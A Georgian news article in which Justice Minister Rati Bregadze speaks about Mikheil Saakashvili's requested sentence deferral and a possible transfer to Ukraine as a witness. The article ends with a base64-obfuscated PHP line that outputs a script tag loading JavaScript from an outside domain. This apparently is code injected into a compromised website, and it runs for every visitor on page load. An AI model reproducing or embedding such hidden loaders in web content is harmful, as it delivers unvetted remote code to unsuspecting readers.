celsiusi
ავერსი საქკაბელი
იუსტიციის მინისტრმა რატი ბრეგაძემ საქართველოს ყოფილი პრეზიდენტის, მიხეილ სააკაშვილისთვის სასჯელის გადავადების საკითხზე საუბრისას განაცხადა, რომ სასჯელის გადავადებას პოლიტიკური მოტივებით არცერთი ქვეყნის კანონმდებლობა არ ცნობს. 
 
მისივე თქმით, ამისთვის არსებობს გაწერილი სამართლებრივი პროცედურები - უნდა მიმართონ სასამართლოს, ბუნებრივია, შესაბამისი მტკიცებულებების წარდგენით.
 
მინისტრის განცხადებით, იუსტიციის სამინისტროს ყველა მოქმედება ნათლად აჩვენებს, რომ კანონი ზედმიწევნითაა დაცული და ყველა მოქმედება კანონმდებლობის სრული დაცვით ხორციელდება.
 
„თუკი ვინმეს აქვს სურვილი, გადაუვადდეს სასჯელი მკურნალობის მიზნით, უნდა მიმართოს სასამართლოს და წარადგინოს შესაბამისი მტკიცებულებები. ეს არ არის პოლიტიკური დისკუსიის საგანი - აქ საუბრობენ ექიმები და საუბრობს სასამართლო. ჩვენ მათ ვუთითებთ, რომ ამ საქმეში აბსოლუტურად არაფერი კეთდება პოლიტიკური ნიშნით. ჩვენ ამ კითხვებზე არ გვაქვს პოლიტიკური პასუხები და ვამბობთ, რომ მტკიცედ სამართლებრივი ხაზით უნდა წავიდეს მთელი ეს პროცედურა“, – განაცხადა იუსტიციის მინისტრმა.
 
რაც შეეხება სააკაშვილის უკრაინული სასამართლოსთვის მოწმის სახით გადაცემის საკითხს, ბრეგაძე ამბობს, რომ ამაზე „უარის თქმის საფუძველი ცალსახადაა გამოკვეთილი“.
 
„მსგავსი სახის ოფიციალური მოთხოვნა არ შემოსულა, ამიტომ ამ საკითხზე მსჯელობა ჩვენი მხრიდან შეიძლება გარკვეულწილად არარელევანტურიც იყოს. თუმცა, როდესაც მსგავსი ტიპის მოთხოვნა შემოდის, იქვე არის საერთაშორისო შეთანხმებებით და საქართველოს კანონმდებლობითაც გათვალისწინებული უარის თქმის საფუძველი, იმ შემთხვევაში, თუ პირის მიმართ ქვეყანაში მიმდინარეობს სისხლის სამართლის წარმოება“,- განაცხადა რატი ბრეგაძემ.
 
რატი ბრეგაძის თქმით, მოთხოვნის მიღების შემთხვევაშიც კი, ქართულ მხარეს სააკაშვილის უკრაინისთვის გადაცემაზე უარის თქმის სამართლებრივი საფუძველი აქვს.
 
„როგორც მოგეხსენებათ, სააკაშვილი არის მსჯავრდებული 2 საქმეზე და დანარჩენ 3 საქმეზე მიმდინარეობს სასამართლო პროცესები. შესაბამისად, თეორიულადაც თუ დავუშვებთ იმასაც, რომ ოფიციალური მოთხოვნა შემოვა, იმთავითვე არსებობს უარის თქმის გამოკვეთილი საფუძველი“, - განაცხადა რატი ბრეგაძემ "იმედთან" საუბარში.
356
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");